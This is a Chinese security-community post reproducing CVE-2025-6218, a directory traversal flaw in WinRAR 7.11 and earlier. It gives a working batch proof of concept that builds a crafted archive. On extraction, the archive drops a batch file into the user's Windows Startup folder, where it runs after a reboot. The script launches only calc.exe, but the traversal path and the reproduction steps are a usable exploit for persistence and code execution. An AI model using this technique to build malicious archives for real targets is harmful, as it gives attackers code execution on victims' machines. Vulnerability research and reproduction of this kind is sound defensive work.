首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞

作者头像
信安百科
发布2025-07-30 15:11:09
发布2025-07-30 15:11:09
22700
代码可运行
举报
文章被收录于专栏:信安百科信安百科
运行总次数:0
代码可运行

0x00 前言

WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。

该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。

从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。

0x01 漏洞描述

漏洞的根本原因在于WinRAR对文件路径的处理不当,恶意构造的文件路径可能导致进程访问不该访问的目录,从而在当前用户上下文中执行恶意代码。

0x02 CVE编号

CVE-2025-6218

0x03 影响版本

WinRAR ≤ 7.11

0x04 漏洞复现

1、下载安装winrar(版本≤ 7.11)

2、使用CVE-2025-6218的POC生成恶意压缩包文件

POC:

https://github.com/skimask1690/CVE-2025-6218-POC

批处理文件内容如下:

代码语言:javascript
代码运行次数:0
运行
复制
@echo off
title CVE-2025-6218 POC

echo calc.exe > POC.bat

"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"  CVE-2025-6218.zip POC.bat

echo.
if errorlevel 1 (
    echo [!] Failed to create POC.
) else (
    echo [+] CVE-2025-6218.zip created successfully!
)
echo.

del POC.bat

pause

注意:

代码语言:javascript
代码运行次数:0
运行
复制
" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
中的\.. \.. \根据当前bat的目录位置决定增加还是减少

3、右键解压缩恶意文件到目录时,触发目录跳转。

4、启动目录成功看到恶意的bat文件

5、重启系统之后可以看到恶意bat文件成功执行。

0x05 参考链接

https://www.zerodayinitiative.com/advisories/ZDI-25-409/

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-07-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安百科 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档